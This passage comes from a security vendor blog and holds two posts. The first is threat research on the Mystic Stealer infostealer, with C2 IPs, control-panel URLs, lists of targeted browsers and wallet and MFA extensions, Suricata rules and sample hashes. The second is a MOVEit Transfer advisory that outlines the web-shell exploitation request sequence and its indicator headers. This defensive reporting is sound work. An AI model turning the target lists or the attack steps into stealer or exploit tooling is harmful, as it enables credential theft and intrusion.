based on past usage, and we note that some of these domains carry reputation scores in various datasets indicating that they had relatively high rankings. For example, looking at gujaratstudy[.]in, we can see that the domain was most recently registered on 2022-10-07. Prior to this date, in 2021, the domain was registered and hosted by a previous owner, with DNS resolution observed through October of 2021. After the new DNS registration by the Grand persona, the domain was initially live via authoritative DNS in on 2023-10-08, and then migrated to Cloudflare DNS on 2023-10-11. This pattern is fairly consistent through domains in the Grand cluster. Another domain, bhandarapolice[.]org, appears to have previously been used for the official website of an Indian district police department. The domain's category labels on VirusTotal still reflect a positive reputation: government, public information, top-1M. A WHOIS record showing the registration details of a representative domain from this set is available in the appendix. The following domains and registration dates are samples of some domains found in this cluster: HANOIGARDEN[.]NET (2022-07-19) BHANDARAPOLICE[.]ORG (2022-07-20) ENGTECHJOURNAL[.]ORG (2022-07-20) MARISOLBLOOMS[.]COM (2022-07-20) WORDCZARMEDIA[.]COM (2022-08-07) COLORADOTRUCKIE[.]COM (2022-08-14) BABYPICTURESULTRASOUND[.]COM (2022-09-08) SACREDSPACE-SF[.]COM (2022-09-08) TEAMMSOLUTIONS[.]COM (2022-09-08) AFRICAHELP[.]ORG (2022-09-13) BAYSWATERHOLDING[.]COM (2022-09-20) ASHRAYAKRUTIFOUNDATION[.]ORG (2022-10-07) GUJARATSTUDY[.]IN (2022-10-07) The nature of the Grand cluster is not completely known at this time. Until recently, the domains have been live and serving Mystic Stealer control panels as shown in Figure 5 below. Figure 5. Example Mystic Stealer control panel domains cached in Google Search cache related to the Grand cluster While possible that they are simply C2 servers, we did not identify file samples associated with them. Recently, many of the sites appear to have gone offline with the upstream CDN reporting connection failures. It may be possible that the domains are part of a traffic distribution or frontend proxy and traffic service. Control Panel The Mystic Stealer developers provide a web-based admin control panel as shown in Figure 6. Figure 6. Mystic Stealer web admin control panel login page Crimeware control panels allow operators to configure settings and access data collected from deployed malware and typically serve as the interface for criminal users to interact with the software. Common functions include statistics dashboards, malware builders, controlling options and features, credential log and data access, integration configurations, and more. The Mystic Stealer control panel operates out of band on a separate exposed service port than the malware utilizes for C2 communications. The developers utilize the Python Django web framework for the control panel. While not exclusive, the use of Python frameworks in crimeware development, typically dominated by PHP applications, is somewhat rare. As a historical example, another crimeware project implemented on Django was the Nice Pack exploit kit. The control panel is deployed on a customer's server. The commonly observed service port for deployed panels is 443/tcp. An earlier observed deployment in March 2023 utilized 8005/tcp. A number of community members have shared information identifying IP addresses of hosting panels. A number of these are also identified and archived on 2023-03-22 Control panel - hXXp://164.132.200[.]171:8005/login/ 2023-03-22 Control panel - hXXp://164.132.200[.]171:8005/login/ 2023-05-02 Control panel - hXXp://135.181.47[.]95/login/ 2023-05-02 Control panel - hXXp://95.216.32[.]74/login/ 2023-05-04 Control panel - hXXp://185.252.179[.]18/ 2023-05-04 Django admin control panel - hXXp://185.252.179[.]18/admin/ 2023-05-15 Control panel - hXXp://212.113.106[.]114/login/ 2023-05-25 Django admin control panel - hXXp://www.coloradotruckie[.]com/admin/ 2023-06-05 Control panel - hXXp://213.142.147[.]235/login/ Tracking an installation of a control panel for the month of May, we've seen the version of the deployed panel change, likely reflecting upgrades by the customer: 2023-05-03: Mystic Stealer - Login 2023-05-08: Mystic Stealer v1.1 - Login 2023-05-31: Mystic Stealer v1.2 - Login We also note that the utilized page style is not exclusive to Mystic Stealer, appearing to be borrowed from or relating to a more broadly accessible template seen with other applications. The control panel UI kit appears to be based on Datta Able for Django. We do not believe there is any connection between this project and Mystic Stealer. It is likely that the Mystic Stealer developer is simply using the publicly available open-source UI kit. Presence on Underground Forums Mystic Stealer made its public debut on underground forums in late April 2023, several weeks after initial samples were known to surface. A seller named Mystic Stealer joined the WWH (WWH-Club) and BHF (Best Hack Forums, using the name MysticStealer) forums just a couple of days before posting, and, the stealer was listed for rent at a price of $150 per month. The seller later advertised Mystic Stealer on the XSS forum. Information-stealing trojans are a hot commodity in the underground economy, underscoring the level of emphasis the criminal community places on the collection of credentials to drive initial access into target user accounts and network environments. With its comprehensive data collection capabilities, it's no surprise that Mystic Stealer has caught the attention of members of these forums. According to observed advertisements, this seller also operates a Telegram account named @mysticstealer and the channel t[.]me/+ZjiasReCKmo2N2Rk (Mystic Stealer News). Conclusion As Mystic Stealer is a new player, it's hard to predict its trajectory. What's clear, however, is that it's a sophisticated threat with the potential for widespread damage. Over the past few weeks, we've observed a fascinating dance of panels appearing and disappearing. Yet, amidst this volatility, a number of these elusive entities have maintained their persistent presence. These patterns could be attributed to a range of factors: perhaps a surge in fresh sales, the relentless pursuit of takedowns, or the unpredictable behavior of the customers themselves. This was a joint research collaboration between Zscaler ThreatLabz and InQuest. Special thanks to all of those involved from InQuest Labs. Cloud Sandbox In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to Mystic Stealer at various levels with the following threat names: Win32.Trojan.Mystic.KV Appendix C2 server endpoints observed in recent bot configurations 194.169.175[.]123:13219 185.252.179[.]18:13219 142.132.201[.]228:13219 135.181.47[.]95:13219 94.130.164[.]47:13219 94.23.26[.]20:13219 91.121.118[.]80:13219 Targeted web browsers Opera K-Meleon Mozilla icecat Mozilla Firefox Comodo IceDragon 8pecxstudios Cyberfox NETGATE Technologies BlackHawk Torch Chedot Kometa liebao Comodo Iridium Vivaldi Orbitum K-Melon Chromium QIP Surf Maxthon3 Nichrome Chromodo Amigo 7Star CentBrowser Mail.Ru Atom Google Chrome Coowon uCozMedia Uran CocCoc Browser Microsoft Edge Sputnik Elements Browser 360Browser Epic Privacy Browser CatalinaGroup Citrio YandexBrowser MapleStudio ChromePlus Brave-Browser Fenrir Inc Sleipnir5 ChromiumViewer Targeted MFA and cryptocurrency wallet browser extensions Extension ID Browser Extension Name Ibnejdfjmmkpcnlpebklmnkoeoihofec TronLink fhbohimaelbohpjbbldcngcnapndodjp BinanceChain ffnbelfdoeiohenkjibnmadjiehjhajb Yoroi jbdaocneiiinmjbjlgalhcelgbejmnid Nifty Wallet afbcbjpbpfadlkmhmclhkeeodmamcflc Math Wallet hnfanknocfeofbddgcijnmhnfnkdnaad Coinbase Wallet hpglfhgfnhbgpjdenjgmdgoeiappafln Guarda blnieiiffboillknjnepogjhkgnoapac EQUAL Wallet cjelfplplebdjjenllpjcblmjkfcffne Jaxx Liberty fihkakfobkmkjojpchpfgcmhfjnmnfpi BitApp Wallet kncchdigobghenbbaddojjnnaogfppfj iWallet amkmjjmmflddogmhpjloimipbofnfjih Wombat nlbmnnijcnlegkjjpcfjclmcfggfefdm MEW CX nanjmdknhkinifnkgdcggcfnhdaammmj GuildWallet nkddgncdjgjfcddamfgcmfnlhccnimig Saturn Wallet fnjhmkhhmkbjkkabndcnnogagogbneec Ronin Wallet cphhlgmgameodnhkjdmkpanlelnlohao NeoLine nhnkbkgjikgcigadomkphalanndcapjk Clover Wallet kpfopkelmapcoipemfendmdcghnegimn Liquality Wallet aiifbnbfobpmeekipheeijimdpnlpgpp Terra Station dmkamcknogkgcdfhhbddcghachkejeap Keplr fhmfendgdocmcbmfikdcogofphimnkno Sollet cnmamaachppnkjgnildpdmkaakejnhae Auro Wallet jojhfeoedkpkglbfimdfabpdfjaoolaf Polymesh Wallet flpiciilemghbmfalicajoolhkkenfel ICONex nknhiehlklippafakaeklbeglecifhad Nabox Wallet hcflpincpppdclinealmandijcmnkbgn KHC ookjlbkiijinhpmnjffcofjonbfbgaoc Temple mnfifefkajgofkcjkemidiaecocnkjeh TezBox lodccjjbdhfakaekdiahmedfbieldgik DAppPlay Ijmpgkjfkbfhoebgogflfebnmejmfbml BitClip lkcjlnjfpbikmcmbachjpdbijejflpcm Steem Keychain nkbihfbeogaeaoehlefnkodbefgpgknn MetaMask bcopgchhojmggmffilplmbdicgaihlkp Hycon Lite Client klnaejjgbibmhlephnhpmaofohgkpgkd ZilPay aeachknmefphepccionboohckonoeemg Coin98 Wallet bhghoamapcdpbohphigoooaddinpkbai Authenticator dkdedlpgdmmkkfjabffeganieamfklkm Cyano Wallet nlgbhdfgdhgbiamfdfmbikcdghidoadd Byone onofpnbbkehpmmoabgpcpmigafmmnjhl Nash Extension cihmoadaighcejopammfbmddcmdekcje Leaf Wallet gaedmjdfmmahhbjefcbgaolhhanlaolb Authy 2FA oeljdldpnmdbchonielidgobddffflal EOS Authenticator ilgcnhelpchnceeipipijaljkblbcobl GAuth Authenticator imloifkgjagghnncjkhggdhalmcnfklk Trezor Password Manager infeboajgfhgbjpjbeppbkgnabfdkdaf OneKey cgeeodpfagjceefieflmdfphplkenlfk EVER Wallet pdadjkfkgcafgbceimcpbkalnfnepbnk KardiaChain Wallet acmacodkjbdgmoleebolmdjonilkdbch Rabby Wallet bfnaelmomeimhlpmgjnjophhpkkoljpa Phantom fhilaheimglignddkjgofkcbgekhenbh Oxygen - Atomic Crypto Wallet mgffkfbidihjpoaomajlbgchddlicgpn Pali Wallet hmeobnfnfcmdkdcmlblgagmfpfboieaf XDEFI Wallet lpfcbjknijpeeillifnkikgncikgfhdo Nami dngmlblcodfobpdpecaadgfbcggfjfnm MultiversX DeFi Wallet bhhhlbepdkbapadjdnnojkbgioiodbic Solflare Wallet jnkelfanjkeadonecabehalmbgpfodjm Goby jhgnbkkipaallpehbohjmkbjofjdmeid SteemKeychain jnlgamecbpmbajjfhmmmlhejkemejdma Braavos Smart Wallet kkpllkodjeloidieedojogacfhpaihoh Enkrypt: Ethereum, Polkadot & RSK Wallet mcohilncbfahbmgdjkbpemcciiolgcge OKX Wallet gjagmgiddbbciopjhllkdnddhcglnemk Hashpack kmhcihpebfmpgmihbkipmjlmmioameka Eternl phkbamefinggmakgklpkljjmgibohnba Pontem Aptos Wallet lpilbniiabackdjcionkobglmddfbcjo Keeper Wallet cjmkndjhnagcfbpiemnkdpomccnjblmj Finnie aijcbedoijmgnlmjeegjaglmepbmpkpi Leap Terra Wallet fdjamakpfbbddfjaooikfcpapjohcfmg Dashlane — Password Manager fooolghllnmhmmndgjiamiiodkpenpbb NordPass® Password Manager & Digital Vault pnlccmojcmeohlpggmfnbbiapkmbliob RoboForm Password Manager hdokiejnpimakedhajhdlcegeplioahd LastPass: Free Password Manager naepdomgkenhinolocfifgehidddafch Browserpass bmikpgodpkclnkgmnpphehdgcimmided MYKI Password Manager & Authenticator efbglgofoippbgcjepnhiblaibcnclgk Martian Wallet for Sui & Aptos Targeted cryptocurrency applications MyMonero Exodus Binance Raven Armory Dogecoin MultiBit Bitcoin DashCore Electrum Litecoin BitcoinGold WalletWasabi Atomic Guarda Electrum-LTC MyCrypto Bisq DeFi Blockchain Coinomi TokenPocket Network signatures The following Suricata signatures detect the initial C2 connection key exchange: alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"LOCAL Mystic Stealer C2 Client Hello Packet"; flow:established,to_server; flowbits:set, mystic_stealer_conn_init; flowbits:noalert; dsize:4; content:"|b5 19 6f 94|"; fast_pattern; reference:md5,df80b1e50cfebb0c4dbf5ac51c5d7254; classtype:trojan-activity; sid:9999990; rev:1; metadata:created_at 2023_06_02, malware_family Mystic Stealer, signature_severity Major, updated_at 2023_06_02;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"LOCAL Mystic Stealer C2 Session Key Response Packet"; flow:established,to_client; flowbits:isset, mystic_stealer_conn_init; dsize:256; reference:md5,df80b1e50cfebb0c4dbf5ac51c5d7254; classtype:trojan-activity; sid:9999991; rev:1; metadata:created_at 2023_06_02, malware_family Mystic Stealer, signature_severity Major, updated_at 2023_06_02;) Indicators of Compromise Mystic Stealer C2 servers Domains observed in the Grand cluster Grand cluster domain nameservers Grand domain cluster WHOIS sample Sample hashes Hash Notes 47439044a81b96be0bb34e544da881a393a30f0272616f52f54405b4bf288c7c Imphash: 8f2649698c183ba2b52e5e425852109d 1367.exe (2023-03-18) Communicates with 164.132.200[.]171:15555 Size ~234 KB Compiler: EP:Microsoft Visual C/C++ (2017 v.15.5-6) [EXE32] Early build 5c0987d0ee43f2d149a38fc7320d9ffd02542b2b71ac6b5ea5975f907f9b9bf8 Imphash: d6d4965d7fe2d90a52736f0db331f81a Mystic Stealer (2023-04-28) Communicates with 94.23.26[.]20:13219 Size ~211 KB Compiler: EP:Microsoft Visual C/C++ (2017 v.15.5-6) [EXE32] acba3311b319a60192be2e29aa8038c863a794be39603a21ee8ee4ccc3ebfca6 Imphash: d6d4965d7fe2d90a52736f0db331f81a update.exe (2023-05-01) Communicates with 185.252.179[.]18:13219 Size ~209 KB Compiler: EP:Microsoft Visual C/C++ (2017 v.15.5-6) [EXE32] 7c185697d3d3a544ca0cef987c27e46b20997c7ef69959c720a8d2e8a03cd5dc Imphash: d6d4965d7fe2d90a52736f0db331f81a update.exe (2023-05-02) Communicates with 185.252.179[.]18:13219 Size ~225 KB Compiler: EP:Microsoft Visual C/C++ (2017 v.15.5-6) [EXE32] 8592e7e7b89cac6bf4fd675f10cc9ba319abd4aa6eaa00fb0b1c42fb645d3410 Imphash: d6d4965d7fe2d90a52736f0db331f81a Mystic Stealer (2023-05-04) Communicates with 185.252.179[.]18:13219 Size ~208 KB Compiler: EP:Microsoft Visual C/C++ (2017 v.15.5-6) [EXE32] 45d29afc212f2d0be4e198759c3c152bb8d0730ba20d46764a08503eab0b454f Imphash: 9cd292d1fac1768b38a49bc6b288c67d Mystic Stealer (2023-05-07) Communicates with 135.181.47[.]95:13219 Size ~180 KB Compiler: EP:Microsoft Visual C/C++ (2017 v.15.5-6) [EXE32] 30fb52e4bd3c4866a7b6ccedcfa7a3ff25d73440ca022986a6781af669272639 Imphash: 9cd292d1fac1768b38a49bc6b288c67d qawsed.exe (2023-05-20) Communicates with 142.132.201[.]228:13219 Compiler: EP:Microsoft Visual C/C++ (2017 v.15.5-6) [EXE32] ce56e45ad63065bf16bf736dccb452c48327803b434e20d58a6fed04f1ce2da9 Imphash: 9cd292d1fac1768b38a49bc6b288c67d Mystic Stealer (2023-05-22) Communicates with 94.130.164[.]47:13219 Size ~187 KB Compiler: EP:Microsoft Visual C/C++ (2017 v.15.5-6) [EXE32 7ab8f9720c5f42b89f4b6feda21e7aa20334ba1230c3aef34b0e6481a3425681 Imphash: 1c8b7141d44e96dcc8c22d3bfdac433c 894d.exe (2023-05-23) Communicates with 91.121.118[.]80:13219 Size ~249 KB Compiler: EP:Microsoft Visual C/C++ (2008-2010) [EXE32] Sample is packed fc4aa58229b6b2b948325f6630fe640c2527345ecb0e675592885a5fa6d26f03 Imphash: baa93d47220682c04d92f7797d9224ce Mystic Stealer (2023-05-25) Communicates with 167.235.34[.]144:13219 Size ~1.79 MB Sample is packed References Analysis resources Thu, 15 jun 2023 09:53:06 -0700 Brett Stone-Gross Coverage Advisory for CVE-2023-34362 MOVEit Transfer Vulnerabilities Updated Security Advisory - June 22, 2023 Progress Software disclosed one more critical vulnerability CVE-2023-35708 with CVSS Base Score 9.8 in its MOVEit Transfer application on 15th June 2023. An unauthenticated remote attacker could exploit the vulnerable version of MOVEit Transfer that could lead to escalated privileges and potential unauthorized access in the environment. An adversary can steal or modify data upon successful exploitation of the SQL injection vulnerability, CVE-2023-35708. Progress software had patched a similar vulnerability CVE-2023-34362 and CVE-2023-35036 recently in the MOVEit transfer application. At the moment, whether this vulnerability, CVE-2023-35708, is exploited in the wild or not is yet to be confirmed, but it is highly likely to be exploited by threat actors. For immediate remediation of all the recent 3 MOVEit Transfer vulnerabilities, disable all HTTP and HTTPs traffic to your MOVEit Transfer environment until the latest patch with the fixes applied. The organizations that applied the patch for the vulnerability CVE-2023-34362 and CVE-2023-35708 are still vulnerable to CVE-2023-35708. The vulnerability affects MOVEit Transfer before versions released before 2021.0.8 (13.0.8), 2021.1.6 (13.1.6), 2022.0.6 (14.0.6), 2022.1.7 (14.1.7), 2023.0.3 (15.0.3). It is important for organizations to apply the latest security patches released by the Progress software mentioned here. Zscaler Coverage: Zscaler’s ThreatLabZ team has deployed protection as mentioned below: Zscaler Private Access AppProtection: Progress MOVEit Transfer SILCertToUser or UserCheckClientCert SQL Injection (CVE-2023-35036 or CVE-2023-35708): 6000667 Updated Security Advisory - June 21, 2023 Progress Software disclosed a new vulnerability CVE-2023-35036 in its MOVEit Transfer application on 12th June 2023. An unauthenticated remote attacker could exploit the latest release of MOVEit Transfer to steal or modify data by exploiting the SQL injection vulnerability known as CVE-2023-35036. Currently, there is no evidence of real-world attacks. Progress software had patched a similar vulnerability CVE-2023-34362 recently in the MOVEit transfer application. At the moment, whether this vulnerability, CVE-2023-35036, is exploited in the wild or not is yet to be confirmed, but it is highly likely to be exploited by threat actors. The organizations that applied the patch for the vulnerability CVE-2023-34362 are still vulnerable to CVE-2023-35036. The vulnerability affects MOVEit Transfer before versions 1.0.7, 1.1.5, 14.0.5, 14.1.6, and 15.0.4. It is important for organizations to apply the latest security patches released by the Progress software mentioned here. Zscaler Coverage: Zscaler’s ThreatLabZ team has deployed protection as mentioned below: Zscaler Private Access AppProtection: Progress MOVEit Transfer SILCertToUser SQL Injection (CVE-2023-35036): 6000667 Security Advisory – June 09, 2023 Background: MOVEit is a managed file transfer software produced by Progress(formerly Ipswitch). The MOVEit encrypts files and uses secure File Transfer Protocols to transfer data with automation, analytics and failover options. The software has been heavily used in the healthcare industry as well as thousands of IT departments in financial services and government sectors. On 31-May-2023, Progress Software disclosed a critical vulnerability CVE-2023-34362 in the MOVEit application. This vulnerability, upon successful exploitation, could allow an unauthenticated attacker to gain access to the MOVEit Transfer's database and allow them to infer information about the internals of the database and alter or delete their elements. What is the issue? MOVEit is typically used for file transfer operations by organizations and has a web application that supports different types of databases like MySQL, Microsoft SQL Server, and Azure SQL. The MOVEit vulnerability allows adversaries to implant a remote web shell on the victim's machine. As shown in the diagram above, an adversary performs the following steps to implant a malicious webshell. App check - GET / - on port 443 Health check - POST /guestaccess.aspx - on port 443 Check token - POST /api/v1/token - on port 443 Check folder - GET /api/v1/folders - on port 443 Upload file - POST /api/v1/folders/[PATH]/files uploadType=resumable - on port 443 Post data - POST /machine2.aspx on port 80 Perform SQL injection - POST /moveitisapi/moveitisapi.dll - on port 443 Prepare session - POST /guestaccess.aspx - on port 443 Upload file - PUT /api/v1/folders/[PATH]/files uploadType=resumable&fileId=[FILEID] - on port 443 Post data - /machine2.aspx - on port 80 Access WebShell - GET /human2.aspx - on port 443 The name of the malicious file, human2.aspx, is intentionally used for webshell to masquerade the original, non malicious file, human.aspx, which typically comes with the installations of MOVEit applications. This ASPX file stages an SQL database account to be used for further access. Once the malicious webshell is installed, it creates a random 36 characters long password which later is used for the authentication purpose. The adversary communicates with the webshell over HTTP protocol with specially crafted HTTP request with a custom header in it, named “X-siLock-Comment”. The value of the custom header contains the password generated during the installation of the malicious webshell. The webshell would return a 404 not found response if the incoming HTTP request doesn’t contain the custom header. Once an adversary successfully authenticates, depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an adversary may be able to build the understanding about the structure and contents of the database, and also execute SQL statements that can alter or delete database elements. The moveitisapi.dll is used to perform SQL injection when requested with specific headers, and guestaccess.aspx is used to prepare a session and extract CSRF tokens and other field values to perform further actions. It connects to the database and offers data exfil functionality based on a provided X-siLock-Step1 header. As of 7 June 2023, there were roughly 2,500 instances of MOVEit Transfer exposed to the public internet. In recent years, File transfer solutions have been a popular target for ransomware groups. As per an advisory published by the Cybersecurity And Infrastructure Security Agency, CISA, threat actors groups like the CL0P Ransomware Gang reportedly started exploiting the same vulnerability and leveraged it to implant a remote web shell on the victim's machine. The Internet facing MOVEit Transfer web applications were infected with a web shell named LEMURLOOT, which was then used to steal data from the victim's machine and underlying MOVEit Transfer databases. Are Zscaler products affected? Zscaler does not utilize Progress Software's MOVEit product. The Zscaler platform is not susceptible to this vulnerability. The trust post is published here. Affected products: The details regarding the affected versions of MOVEit Transfer are present here. As per Progress Software, this vulnerability affects all versions of MOVEit Transfer. However, it doesn’t affect MOVEit Automation, MOVEit Client, MOVEit Add-in for Microsoft Outlook, MOVEit Mobile, WS_FTP Client, WS_FTP Server, MOVEit EZ, MOVEit Gateway, MOVEit Analytics and MOVEit Freely. Mitigations: The Progress Software also released a security advisory mentioning the details related to the patch with the fix and recommended remediations and mitigation steps. If one is using MOVEit Transfer versions before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), then it is strongly recommended to upgrade them to the versions in which this vulnerability is patched, as per the details given here. Investigation Tips: The IIS access logs can be checked for indicators of compromise on the host in question. At the endpoint, presence of files named human2.aspx or _human2.aspx in \MOVEitTransfer\wwwroot\ folder. Based on known cases of exploitation so far, compromise would involve incoming requests to the following endpoints (in this order) guestaccess.aspx, followed by moveitisapi.dll, followed by human2.aspx or _human2.aspx In case header values are logged, requests/responses with the following HTTP header names are confirmed indicators of compromise : X-siLock-Comment X-siLock-Step1 X-siLock-Step2 X-siLock-Step3 Locate MOVEit root directory from HKEY_LOCAL_MACHINE\SOFTWARE\Standard Networks\siLock->WebBaseDir Locate MOVEit log file location HKEY_LOCAL_MACHINE\SOFTWARE\Standard Networks\siLock->LogsBaseDir Best Practices/Guidelines To follow: Safeguard crown jewel applications by limiting lateral movement using Zscaler Private Access, especially with application security modules turned on. Route all server traffic through Zscaler Internet Access, which will provide the right visibility to identify and stop malicious activity from compromised systems/servers. Restrict traffic to the critical infrastructure from the allowed list of known-good destinations. Ensure you are inspecting all SSL traffic. Turn on Advanced Threat Protection to block all known command-and-control domains. This will provide additional protection in case the adversary exploits this vulnerability to implant malware. Extend command-and-control protection to all ports and protocols with the Advanced Cloud Firewall (Cloud IPS module), including emerging C2 destinations. Again, this will provide additional protection in case if the adversary exploits this vulnerability to implant malware. Use Advanced Cloud Sandbox to prevent unknown malware delivered as part of a second stage payload. Zscaler Coverage: Zscaler’s ThreatLabZ team has deployed protection as mentioned below: Zscaler Advanced Threat Protection Signatures: WIN32.EXPLOIT.CVE-2023-34362 APP.EXPLOIT.CVE-2023-34362 HTML.EXPLOIT.CVE-2023-34362 Zscaler Private Access AppProtection: MOVEit Transfer moveitisapi SQL Injection (CVE-2023-34362): 6000662 Details related to the threat signatures released by Zscaler can be found in the Zscaler Threat Library. Additional References: Fri, 09 jun 2023 12:05:41 -0700 Jithin Nair